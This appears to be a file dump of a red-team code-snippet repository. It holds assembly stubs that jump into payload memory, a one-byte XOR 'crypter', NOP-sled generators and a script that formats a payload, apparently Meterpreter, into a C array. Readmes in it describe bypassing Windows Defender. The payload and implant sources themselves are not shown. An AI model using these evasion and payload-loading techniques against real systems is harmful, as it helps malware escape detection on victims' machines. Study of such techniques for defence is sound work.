/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/bad_fn_ptr.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22621.0:
2 | Debug|x64|C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\|
3 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb
--------------------------------------------------------------------------------
/Cpp/call_stack/compile.bat:
--------------------------------------------------------------------------------
REM Assemble both NASM sources into 64-bit Windows (win64 COFF) object files.
nasm -f win64 payload.asm -o payload.o
nasm -f win64 ramp.asm -o ramp.o
REM Compile main_clean.cpp and link it with ramp.o. -masm=intel makes GCC read
REM inline assembly in Intel syntax. payload.o is built above but does not
REM appear on this link line.
x86_64-w64-mingw32-g++.exe main_clean.cpp ramp.o -o main_clean.exe -masm=intel
--------------------------------------------------------------------------------
/Cpp/call_stack/main_clean.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_clean.exe
--------------------------------------------------------------------------------
/Cpp/call_stack/main_dirty.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_dirty.exe
--------------------------------------------------------------------------------
/Cpp/call_stack/payload.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/payload.o
--------------------------------------------------------------------------------
/Cpp/call_stack/ramp.asm:
--------------------------------------------------------------------------------
section .text
default rel
bits 64

global onRamp
global offRamp

;nasm -f win64 ramp.asm -o ramp.o

; onRamp(exec_mem, return_address): rcx = exec_mem, rdx = return_address.
; Swaps the top stack slot for return_address and the address of offRamp,
; then jumps (not calls) to exec_mem.
onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx
    pop rax ; corrupt previous frame: discards the top stack slot (the caller's return address if onRamp was reached via call)
    push rdx ; push the return_address argument
    lea rax, [offRamp] ; get offRamp address
    push rax ; if payload returns, it'll return to our off ramp
    jmp rcx ; execute exec_mem

; offRamp: jumps to the address stored at the location r13 points to.
; NOTE(review): r13 is not written anywhere in this file, so this path relies
; on register state set up elsewhere - confirm against the caller/payload.
offRamp: ; slide back into normal execution (dangerous!)
    mov rax, [r13] ; get return_address
    jmp rax ; jump to return_address
    nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps
--------------------------------------------------------------------------------
/Cpp/call_stack/ramp.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/ramp.o
--------------------------------------------------------------------------------
/Cpp/clean_stacks/baseline.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/baseline.exe
--------------------------------------------------------------------------------
/Cpp/clean_stacks/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/implant.exe
--------------------------------------------------------------------------------
/Cpp/clean_stacks/implant_backup_1.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel
5 |
6 | /* Reference
7 | asm ( "assembly code"
8 | : output operands optional
9 | : input operands optional
10 | : list of clobbered registers optional
11 | );
12 | */
13 |
14 | extern "C" void onRamp(PVOID exec_mem, PVOID ret_addr);
15 |
/*
 * Demonstration entry point: captures the address of the ReturnHere label
 * with inline assembly, prints it, then executes a breakpoint instruction
 * placed directly before that label. onRamp() is declared above but is not
 * called in this file.
 */
int main(void){
    printf("Implant running...\n");

    void * ret_addr = NULL;
    // RIP-relative lea written in Intel syntax (hence -masm=intel on the build
    // line); the result is the address of the ReturnHere label defined below.
    asm("lea %0, [rip+ReturnHere];"
        : "=r" (ret_addr) // ret_addr <- rip+ReturnHere
        : // no inputs
        : // no predefined clobbers
    );

    printf("Return address: %p\n",ret_addr); // get return address

    // int3 is the x86 breakpoint instruction; ReturnHere labels the
    // instruction that follows it, i.e. the address printed above.
    asm("int3; ReturnHere:;"); //ret_addr
    printf("Exiting implant...\n");
}
31 |
32 |
33 | // nasm -f win64 payload.asm -o payload.o
34 | // nasm -f win64 ramp.asm -o ramp.o
35 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel
--------------------------------------------------------------------------------
/Cpp/clean_stacks/payload.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/payload.o
--------------------------------------------------------------------------------
/Cpp/clean_stacks/ramp.asm:
--------------------------------------------------------------------------------
section .text
default rel
bits 64

global onRamp

; onRamp(exec_mem, return_address): rcx = exec_mem, rdx = return_address.
; Pushes return_address and the address of offRamp, records where each one
; sits on the stack in r13 / r15, then jumps to exec_mem.
onRamp: ; onRamp (exec_mem, return_address) // rcx, rdx
    mov r13, rdx ; preserve our return address
    push r13 ; put return_address on the stack
    lea r13, [rsp] ; r13 = address of the stack slot that now holds return_address

    lea r15, offRamp ; preserve offRamp address
    push r15 ; put r15 on the stack
    lea r15, [rsp] ; r15 = address of the stack slot that holds the offRamp address

    sub rsp, 0x20 ; protect our addresses: move rsp 0x20 bytes below the two saved slots

    jmp rcx ; jmp to our payload

; offRamp: pops 8-byte slots until rsp equals the slot address saved in r13,
; then ret consumes that slot (return_address) as the jump target.
offRamp:

loop:
    pop rax ; pop value off the stack
    cmp rsp,r13 ; check if rsp = r13 (the comparison uses r13, not r15)
    jne loop ; loop if there's still garbage on the stack

    ret
28 |
29 |
30 |
--------------------------------------------------------------------------------
/Cpp/clean_stacks/ramp.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/ramp.o
--------------------------------------------------------------------------------
/Cpp/create_process/CreateProcess.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
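/*
 * Launches notepad.exe with CreateProcessA and reports the new process ID.
 *
 * Returns 0 when the process was created and 1 otherwise; on failure the
 * Win32 error code from GetLastError() is printed.
 */
int main(){

    // Zero the structure first and set cb afterwards. The earlier order
    // assigned cb and then wiped it with ZeroMemory, so the API was handed
    // cb == 0 instead of the structure size the CreateProcess documentation
    // requires.
    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi)); // receives the new process/thread handles and IDs

    // The ANSI entry point is named explicitly because every string argument
    // below is a narrow literal.
    BOOL success = CreateProcessA(
        "C:\\Windows\\System32\\notepad.exe", // lpApplicationName: fully qualified, so no search-path lookup decides what runs
        NULL,                                 // lpCommandLine
        NULL,                                 // lpProcessAttributes
        NULL,                                 // lpThreadAttributes
        FALSE,                                // bInheritHandles: the child gets none of our handles
        0,                                    // dwCreationFlags
        NULL,                                 // lpEnvironment: use the parent's environment
        "C:\\Windows\\System32",              // lpCurrentDirectory
        &si,
        &pi);

    if (!success){
        // DWORD is an unsigned 32-bit value; %lu with a cast matches it.
        printf("Failed to create process. Error code: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    printf("Process created with PID: %lu\n", (unsigned long)pi.dwProcessId);

    // CreateProcess returns open handles to the new process and its primary
    // thread; close them so they are not leaked. The child keeps running.
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}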
--------------------------------------------------------------------------------
/Cpp/create_process/CreateProcess.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/create_process/CreateProcess.exe
--------------------------------------------------------------------------------
/Cpp/create_process/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/crypter/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds crypter.exe (64-bit console program) from main.cpp with MSVC.
REM   /Od  disable optimization      /MT    link the static C runtime
REM   /W0  suppress all warnings     /GS-   turn OFF the buffer security check
REM   /DNDEBUG define NDEBUG         /EHsc  standard C++ exception handling
REM   /Tpmain.cpp  compile main.cpp as C++
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpmain.cpp /EHsc /link /OUT:crypter.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/crypter/crypter.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/crypter.exe
--------------------------------------------------------------------------------
/Cpp/crypter/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
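/*
 * XORs every byte of an input file with a fixed one-byte key and writes the
 * result to an output file.
 *
 * argv[1] is the input path and argv[2] the output path. Returns 0 on
 * success and 1 on a usage error, a failed open, or a failed read/write.
 *
 * Note: a single hard-coded XOR byte is obfuscation, not encryption. Running
 * the tool on its own output restores the original file, and the data can be
 * recovered without the source by trying all 256 possible key bytes.
 */
int main(int argc, char* argv[]) {
    // Both paths are required.
    if (argc < 3) {
        // The operand names were missing from the usage text; the names used
        // here are descriptive placeholders for the two path arguments.
        std::cerr << "Usage: " << argv[0] << " <input_file> <output_file>" << std::endl;
        return 1;
    }

    // Binary mode so no newline translation alters the bytes.
    std::ifstream input_file(argv[1], std::ios::binary);
    if (!input_file) {
        std::cerr << "Error: Could not open input file " << argv[1] << std::endl;
        return 1;
    }

    std::ofstream output_file(argv[2], std::ios::binary);
    if (!output_file) {
        std::cerr << "Error: Could not open output file " << argv[2] << std::endl;
        return 1;
    }

    const char key = 'K'; // Key used for the XOR transform
    char buffer;
    // Stop as soon as either stream fails so a write error is not ignored.
    while (output_file && input_file.get(buffer)) {
        buffer ^= key;
        output_file.put(buffer);
    }

    // End of file sets eofbit/failbit; badbit means a real read error.
    const bool read_failed = input_file.bad();

    input_file.close();
    output_file.close(); // flushes; a failed flush leaves the stream in a failed state

    if (read_failed || !output_file) {
        std::cerr << "Error: I/O failure while processing " << argv[1] << std::endl;
        return 1;
    }

    return 0;
}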
--------------------------------------------------------------------------------
/Cpp/crypter/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/main.obj
--------------------------------------------------------------------------------
/Cpp/crypter/out.txt:
--------------------------------------------------------------------------------
1 | ?.8?
--------------------------------------------------------------------------------
/Cpp/crypter/test.txt:
--------------------------------------------------------------------------------
1 | test
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/build_the_sleigh.py:
--------------------------------------------------------------------------------
# Python 2 script: this is the print statement form, which is a SyntaxError
# under Python 3.
# Writes the text "0x90, " repeated 1,024,000 times to stdout as one line.
# 0x90 is the x86 NOP opcode; presumably the output is pasted into a C array
# initializer - confirm against implant.cpp.
print '0x90, ' * 1024000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.exe (64-bit console program) from implant.cpp with MSVC.
REM   /Od  disable optimization      /MT   link the static C runtime
REM   /W0  suppress all warnings     /GS   buffer security check left ON
REM   /std:c++20  C++20 language mode      /DNDEBUG  define NDEBUG
REM   /Tpimplant.cpp  compile implant.cpp as C++
REM   /STACK:3000000000  linker option: reserve 3,000,000,000 bytes of stack
cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:3000000000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/beautify.py:
--------------------------------------------------------------------------------
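"""Print a file's bytes as a C ``unsigned char payload[]`` initializer.

Usage: beautify.py <file>

The array text is written to stdout. If the argument is missing or the file
cannot be read, a usage message is printed and the script exits with status 1
(the earlier version exited with status 0 on that error path).
"""
import sys


def to_c_array(data):
    """Return ``data`` (a bytes-like object) formatted as a C array definition.

    Each byte is written as unpadded lowercase hex (``0x1``, ``0x90``), the
    same digits the script produced before. An empty input yields an empty
    initializer instead of the stray ``0x`` token the old join emitted.
    """
    # bytearray() iterates as ints on both Python 2 and Python 3. The previous
    # hex(ord(x)) form raised TypeError on Python 3, where iterating over
    # bytes already yields ints.
    body = ', '.join('0x%x' % b for b in bytearray(data))
    return 'unsigned char payload[] = { ' + body + ' };'


if __name__ == "__main__":
    try:
        # Binary mode keeps the bytes untranslated; the context manager closes
        # the handle, which the bare open().read() left to the interpreter.
        with open(sys.argv[1], "rb") as fh:
            plaintext = fh.read()
    except (IndexError, IOError, OSError):
        # IndexError: no argument given. IOError/OSError: file not readable.
        # A bare except would also have swallowed KeyboardInterrupt.
        print("File argument needed! %s " % sys.argv[0])
        sys.exit(1)

    #open("payload.out",'wb').write(plaintext)
    print(to_c_array(plaintext))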
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/build_the_sleigh.py:
--------------------------------------------------------------------------------
# Python 2 script: this is the print statement form, which is a SyntaxError
# under Python 3.
# Writes the text "0x90, " repeated 2,048,000 times to stdout as one line.
# 0x90 is the x86 NOP opcode; presumably the output is pasted into a C array
# initializer - confirm against the implant source.
print '0x90, ' * 2048000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.cpp as C++20 (/Tp, /std:c++20) into a 64-bit console
REM executable: static CRT (/MT), optimisation off (/Od), warnings suppressed
REM (/W0), stack buffer security checks on (/GS), NDEBUG defined.
REM Options after /link go to the linker. /STACK:300000000 requests a stack
REM reserve of 300,000,000 bytes, one tenth of the value used by the
REM compile.bat in the parent directory. The number ends up in the PE
REM optional header (SizeOfStackReserve), where static triage can read it.
cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:300000000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/vt_results.txt:
--------------------------------------------------------------------------------
1 | https://www.virustotal.com/gui/file-analysis/OGY3Y2M5M2ZjNDkwZDZkZGMxN2Y2N2EyZmIzNDlhMjQ6MTY3MjI4NTY3Nw==
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/Readme.md:
--------------------------------------------------------------------------------
1 | Collection of code snippets used to bypass Windows Defender's protections.
2 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/Readme.md:
--------------------------------------------------------------------------------
1 | Using a simple name check to bypass Windows Defender.
2 |
3 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.cpp into a 64-bit console executable named implant.exe.
REM /Tc makes cl.exe compile the file as C despite its .cpp extension.
REM /GS- turns stack buffer security checks off, /W0 suppresses all warnings,
REM /Od disables optimisation, /MT links the static CRT, /DNDEBUG defines NDEBUG.
REM Options after /link go to the linker.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/name_bypass/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.cpp into a 64-bit console executable named implant.exe.
REM /Tc makes cl.exe compile the file as C despite its .cpp extension.
REM /GS- turns stack buffer security checks off, /W0 suppresses all warnings,
REM /Od disables optimisation, /MT links the static CRT, /DNDEBUG defines NDEBUG.
REM Options after /link go to the linker.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.obj
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/calc_x64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/calc_x64.bin
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Cross-compiles good.cpp with the MinGW-w64 g++ that targets 64-bit
REM Windows and writes good_x64.exe. -Wl,-subsystem,windows hands
REM "-subsystem windows" to the linker, so the result is a GUI-subsystem
REM program that opens no console window. No optimisation or warning flags
REM are passed.
x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/good.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * By 0xTriboulet
3 | * "good.exe" program
4 | * 12/31/22
5 | * compile with: x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows
6 | */
7 |
8 | #include
9 | #include
10 |
11 | #pragma comment(lib, "user32.lib")
12 | #pragma comment(lib, "kernel32.lib")
13 |
/*
 * GUI entry point. Shows a single modal message box with an OK button and
 * then exits with status 0. None of the four WinMain arguments are read.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow) {
    const UINT boxStyle = MB_OK;  /* MB_OK is 0, the plain OK-button style */

    /* No owner window (NULL); the call returns once the box is dismissed. */
    MessageBox(NULL, "This is a safe program!", "Safe!", boxStyle);

    return 0;
}
19 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/good_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/good_x64.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/test.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
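/*
 * Resolves the address of CreateThread in kernel32 at run time and prints it.
 *
 * Waits for one character on stdin before doing anything. Returns 0 when the
 * address was resolved and 1 when either lookup step failed; the failing
 * step and GetLastError() are printed in that case.
 */
int main(VOID){
    HMODULE hKernel32;
    FARPROC a;

    /* Block until a character is read from stdin. */
    getchar();
    //__debugbreak();

    /* Check the module handle before using it for the export lookup. */
    hKernel32 = LoadLibraryA("kernel32");
    if (hKernel32 == NULL) {
        printf("LoadLibraryA failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    a = GetProcAddress(hKernel32, "CreateThread");
    //__debugbreak();
    if (a == NULL) {
        /* Do not report success for an address that was never resolved. */
        printf("GetProcAddress failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    /* %p takes a void *, so the function pointer is cast for printing. */
    printf("address: %p\n", (void *)a);
    printf("Success!\n");
    return 0;
}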
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/calc_payload_32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/calc_payload_32.bin
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Cross-compiles good.cpp with the MinGW-w64 g++ that targets 32-bit
REM Windows and writes good.exe. -Wl,-subsystem,windows hands
REM "-subsystem windows" to the linker, so the result is a GUI-subsystem
REM program that opens no console window.
REM good.cpp's header comment gives this command with an extra -ansi flag;
REM that flag is not passed here.
i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/even_better.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/even_better_ansi.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better_ansi.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * By 0xTriboulet
3 | * "good.exe" program
4 | * 12/31/22
5 | * compile with: i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -ansi
6 | */
7 |
8 | #include
9 | #include
10 |
11 | #pragma comment(lib, "user32.lib")
12 |
/*
 * GUI entry point. Shows a single modal message box with an OK button and
 * then exits with status 0. None of the four WinMain arguments are read.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow) {
    const UINT boxStyle = MB_OK;  /* MB_OK is 0, the plain OK-button style */

    /* No owner window (NULL); the call returns once the box is dismissed. */
    MessageBox(NULL, "This is a safe program!", "Safe!", boxStyle);

    return 0;
}
18 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.obj:
--------------------------------------------------------------------------------
